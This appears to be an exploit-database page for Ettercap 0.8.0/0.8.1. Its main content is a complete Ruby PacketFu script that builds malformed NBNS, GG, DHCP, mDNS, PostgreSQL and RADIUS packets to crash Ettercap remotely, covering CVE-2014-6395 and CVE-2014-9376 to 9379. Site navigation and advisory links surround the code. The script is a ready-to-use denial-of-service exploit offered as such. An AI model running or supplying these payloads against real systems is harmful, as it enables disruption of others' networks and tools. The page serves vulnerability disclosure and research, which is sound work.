Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Ettercap 0.8.0 / 0.8.1 Denial Of Service

🗓️ 20 Dec 2014 00:00:00Reported by Nick SampanisType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 35 Views

Ettercap 0.8.0 / 0.8.1 Denial Of Service Exploit

Related
Code
ReporterTitlePublishedViews
Family
0day.today		Ettercap 0.8.0 / 0.8.1 Denial Of Service Exploit
21 Dec 201400:00
zdt
ArchLinux		ettercap: multiple issues
17 Mar 201500:00
archlinux
ArchLinux		ettercap-gtk: multiple issues
17 Mar 201500:00
archlinux
CNVD		Ettercap Heap Buffer Overflow Vulnerability
26 Dec 201400:00
cnvd
CVE		CVE-2014-6395
19 Dec 201415:00
cve
CVE		CVE-2014-9376
19 Dec 201415:00
cve
CVE		CVE-2014-9377
19 Dec 201415:00
cve
CVE		CVE-2014-9378
19 Dec 201415:00
cve
CVE		CVE-2014-9379
19 Dec 201415:00
cve
Cvelist		CVE-2014-6395
19 Dec 201415:00
cvelist
Rows per page
`#Exploit Title: 6 Remote ettercap Dos exploits to 1  
#Date: 19/12/2014  
#Exploit Author: Nick Sampanis  
#Vendor Homepage: http://ettercap.github.io  
#Software Link: https://github.com/Ettercap/ettercap/archive/v0.8.1.tar.gz  
#Version: 8.0-8.1  
#Tested on: Linux  
#CVE: CVE-2014-6395 CVE-2014-9376 CVE-2014-9377 CVE-2014-9378 CVE-2014-9379  
#Make sure that you have installed packefu and pcaprub  
  
require 'packetfu'  
include PacketFu  
  
if ARGV.count < 4  
puts "[-]Usage #{$PROGRAM_NAME} src_ip dst_ip src_mac iface"  
puts "[-]Use valid mac for your interface, if you dont know"+  
" victim's ip address use broadcast"  
exit  
end  
  
def nbns_header  
u = UDPPacket.new()  
u.eth_saddr = ARGV[2]  
u.eth_daddr = "ff:ff:ff:ff:ff:ff"  
u.ip_daddr = ARGV[1]  
u.ip_saddr = ARGV[0]  
u.udp_src = 4444  
u.udp_dst = 137  
u.payload = "\xa0\x2c\x01\x10\x00\x01\x00\x00\x00\x00\x00\x00"  
u.payload << "\x20\x46\x48\x45\x50\x46\x43\x45\x4c\x45\x48\x46"#name  
u.payload << "\x43\x45\x50\x46\x46\x46\x41\x43\x41\x43\x41\x43"#name  
u.payload << "\x41\x43\x41\x43\x41\x43\x41\x41\x41\x00"#name  
u.payload << "\x00\x20" #type  
u.payload << "\x00\x01" #class  
u.payload << "A"*1000 #pad  
u.recalc  
u.to_w(ARGV[3])  
end  
def gg_client  
u = TCPPacket.new()  
u.eth_saddr = ARGV[2]  
u.eth_daddr = "ff:ff:ff:ff:ff:ff"  
u.ip_saddr = ARGV[0]  
u.ip_daddr = ARGV[1]  
u.tcp_src = 3333  
u.tcp_dst = 8074  
u.payload = "\x15\x00\x00\x00" #gg_type  
u.payload << "\xe8\x03\x00\x00" #gg_len  
u.payload << "A"*1000  
u.recalc  
u.to_w(ARGV[3])  
end  
def dhcp_header  
u = UDPPacket.new()  
u.eth_saddr = ARGV[2]  
u.eth_daddr = "ff:ff:ff:ff:ff:ff"  
u.ip_daddr = ARGV[0]  
u.ip_saddr = ARGV[1]  
u.udp_src = 67  
u.udp_dst = 4444  
u.payload = "\x02"*236  
u.payload << "\x63\x82\x53\x63"  
u.payload << "\x35"  
u.payload << "\x00\x05\x00"  
u.payload << "\x51"  
u.payload << "\x00" #size  
u.payload << "A" * 3 #pad  
u.recalc  
u.to_w(ARGV[3])  
end  
  
def mdns_header  
u = UDPPacket.new()  
u.eth_saddr = ARGV[2]  
u.eth_daddr = "ff:ff:ff:ff:ff:ff"  
u.ip_daddr = ARGV[1]  
u.ip_saddr = ARGV[0]  
u.udp_src = 4444  
u.udp_dst = 5353  
u.payload = "\x11\x11" #id  
u.payload << "\x00\x00" #flags  
u.payload << "\x00\x01" #questions  
u.payload << "\x00\x00" #answer_rr  
u.payload << "\x00\x00" #auth_rrs  
u.payload << "\x00\x00" #additional_rr  
u.payload << "\x06router\x05local\x00" #name  
u.payload << "\x00\x01" #type  
u.payload << "\x00\x01" #class  
u.recalc  
u.to_w(ARGV[3])  
end  
def mdns_dos_header  
u = UDPPacket.new()  
u.eth_saddr = ARGV[2]  
u.eth_daddr = "ff:ff:ff:ff:ff:ff"  
u.ip_daddr = ARGV[1]  
u.ip_saddr = ARGV[0]  
u.udp_src = 4444  
u.udp_dst = 5353  
u.payload = "\x11\x11" #id  
u.payload << "\x00\x00" #flags  
u.payload << "\x00\x01" #questions  
u.payload << "\x00\x00" #answer_rr  
u.payload << "\x00\x00" #auth_rrs  
u.payload << "\x00\x00" #additional_rr  
u.payload << "\x01"  
u.payload << "\x00\x01" #type  
u.payload << "\x00\x01" #class  
u.payload << "A"*500  
u.recalc  
u.to_w(ARGV[3])  
end  
  
def pgsql_server  
u = TCPPacket.new()  
u.eth_saddr = ARGV[2]  
u.eth_daddr = "ff:ff:ff:ff:ff:ff"  
u.ip_saddr = ARGV[1]  
u.ip_daddr = ARGV[0]  
u.tcp_src = 5432  
u.tcp_dst = 3333  
u.payload = "\x52\x00\x00\x00\x08\x00\x00\x00\x03\x73\x65\x72\x02\x74\x65\x73\x74\x00\x64\x61\x74\x61\x62\x61\x73\x65\x02\x74\x65\x73\x74\x00\x63\x6c\x69\x65\x6e\x74\x5f\x65\x6e\x63\x6f\x64\x69\x6e\x67\x00\x55\x4e\x49\x43\x4f\x44\x45\x00\x44\x61\x74\x65\x53\x74\x79\x6c\x65\x00\x49\x53\x4f\x00\x54\x69\x6d\x65\x5a\x6f\x6e\x65\x00\x55\x53\x2f\x50\x61\x63\x69\x66\x69\x63\x00\x00"  
u.recalc  
u.to_w(ARGV[3])  
end  
def pgsql_client  
u = TCPPacket.new()  
u.eth_saddr = ARGV[2]  
u.eth_daddr = "ff:ff:ff:ff:ff:ff"  
u.ip_saddr = ARGV[0]  
u.ip_daddr = ARGV[1]  
u.tcp_src = 3333  
u.tcp_dst = 5432  
u.payload = "\x70\x00\x00\x5b\x00\x03\x00\x00\x75\x73\x65\x72\x02\x74\x65\x73\x74\x00\x64\x61\x74\x61\x62\x61\x73\x65\x02\x74\x65\x73\x74\x00\x63\x6c\x69\x65\x6e\x74\x5f\x65\x6e\x63\x6f\x64\x69\x6e\x67\x00\x55\x4e\x49\x43\x4f\x44\x45\x00\x44\x61\x74\x65\x53\x74\x79\x6c\x65\x00\x49\x53\x4f\x00\x54\x69\x6d\x65\x5a\x6f\x6e\x65\x00\x55\x53\x2f\x50\x61\x63\x69\x66\x69\x63\x00\x00"  
u.recalc  
u.to_w(ARGV[3])  
end  
  
def pgsql_client_shell  
u = TCPPacket.new()  
u.eth_saddr = ARGV[2]  
u.eth_daddr = "ff:ff:ff:ff:ff:ff"  
u.ip_saddr = ARGV[0]  
u.ip_daddr = ARGV[1]  
u.tcp_src = 3333  
u.tcp_dst = 5432  
u.payload = "\x70"  
u.payload << "\x00\x00\x03\xe9" #len  
u.payload << "A"*1000  
u.payload << "\x00"  
u.recalc  
u.to_w(ARGV[3])  
end  
  
def radius_header  
u = UDPPacket.new()  
u.eth_saddr = ARGV[2]  
u.eth_daddr = "ff:ff:ff:ff:ff:ff"  
u.ip_daddr = ARGV[1]  
u.ip_saddr = ARGV[0]  
u.udp_src = 4444  
u.udp_dst = 1645  
u.payload = "\x01\x01\x00\xff\x00\x01\x00\x00\x00\x00\x00\x00\x20\x46\x48\x00\x50\x46\x43\xff\x01\x00\x48\x46\x01\x00\x50\x46\x46\x46\x41\x43\x41\x43\x41\x43\x41\x43\x41\x43\x41\x43\x41\x41\x41\x00\x00\x20\x00\x01"  
u.recalc  
u.to_w(ARGV[3])  
end  
  
puts "[+]6 Remote ettercap Dos exploits to 1 by Nick Sampanis"  
puts "[+]-1- nbns plugin CVE-2014-9377"  
puts "[+]-2- gg dissector CVE-2014-9376"  
puts "[+]-3- dhcp dissector CVE-2014-9376"  
puts "[+]-4- mdns plugin CVE-2014-9378"  
puts "[+]-5- postgresql dissector CVE-2014-6395(works only in 8.0)"  
puts "[+]-6- radius dissector CVE-2014-9379"  
print "choice:"  
choice = $stdin.gets.chomp().to_i()  
  
case choice  
when 1  
puts "[+]Sending nbns packet.."  
nbns_header  
when 2  
puts "[+]Sending client gg packet.."  
gg_client  
when 3  
puts "[+]Sending dhcp packet.."  
dhcp_header  
when 4  
puts "[+]Sending mdns packet.."  
mdns_header  
mdns_dos_header  
when 5  
puts "[+]Sending pgsql packet.."  
pgsql_client  
pgsql_server  
pgsql_client_shell  
when 6  
puts "[+]Sending radius packet.."  
radius_header  
else  
puts "[-]Unrecognized command "  
end  
  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
20 Dec 2014 00:00Current
6.3Medium risk
Vulners AI Score6.3
EPSS0.26583
ettercapdenial of serviceexploitremotecve-2014-6395cve-2014-9376cve-2014-9377cve-2014-9378cve-2014-9379linuxpacketfupcaprubvulnerability
35